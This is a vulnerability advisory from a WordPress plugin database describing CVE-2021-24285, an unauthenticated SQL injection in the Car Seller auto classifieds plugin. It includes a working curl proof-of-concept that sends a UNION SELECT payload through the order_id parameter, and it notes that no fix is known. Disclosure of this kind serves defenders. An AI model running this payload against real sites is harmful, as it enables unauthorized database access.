WordPress Plugin Vulnerabilities

Car Seller - Auto Classifieds Script <= 2.1.0 - Unauthenticated SQL Injection

Description

The request_list_request AJAX call of the plugin, available to both authenticated and unauthenticated users, does not sanitise, validate or escape the order_id POST parameter before using it in a SQL statement, leading to a SQL Injection issue.

Proof of Concept

curl 'https://example.com/wp-admin/admin-ajax.php' \
  --data-raw 'action=request_list_request&order_id=-1662 UNION ALL SELECT NULL,NULL,current_user(),current_user(),current_user(),NULL,current_user(),current_user(),NULL-- -' \
  --compressed \
  --insecure

Affects Plugins

Plugin icon
cars-seller-auto-classifieds-script
No known fix

References

CVE
CVE-2021-24285
URL
https://codevigilant.com/disclosure/2021/24-04-2021-wp-plugin-cars-seller-auto-classifieds-script-sql-injection/

Classification

Type
SQLI
OWASP top 10
A1: Injection
CWE
CWE-89
CVSS
9.9 (critical)

Miscellaneous

Original Researcher
Shreya Pohekar of Codevigilant Project
Verified
Yes
WPVDB ID
f35d6ab7-dd52-48b3-a79c-3f89edf24162

Timeline

Publicly Published
2021-04-26 (about 3 years ago)
Added
2021-04-26 (about 3 years ago)
Last Updated
2021-04-29 (about 3 years ago)

Other

Published
Title
Published
2024-04-12
Title
Find Duplicates <= 1.4.6 - Authenticated (Subscriber+) SQL Injection
Published
2021-05-31
Title
Yes/No Chart < 1.0.12 - Authenticated (contributor+) Blind SQL Injection
Published
2015-03-17
Title
Gravity Forms 1.8 <= 1.9.3.5 - Authenticated Blind SQL Injection
Published
2017-02-26
Title
Note Press < 0.1.2 - SQL Injection
Published
2014-08-01
Title
portfolio-slideshow-pro v3 - SQL Injection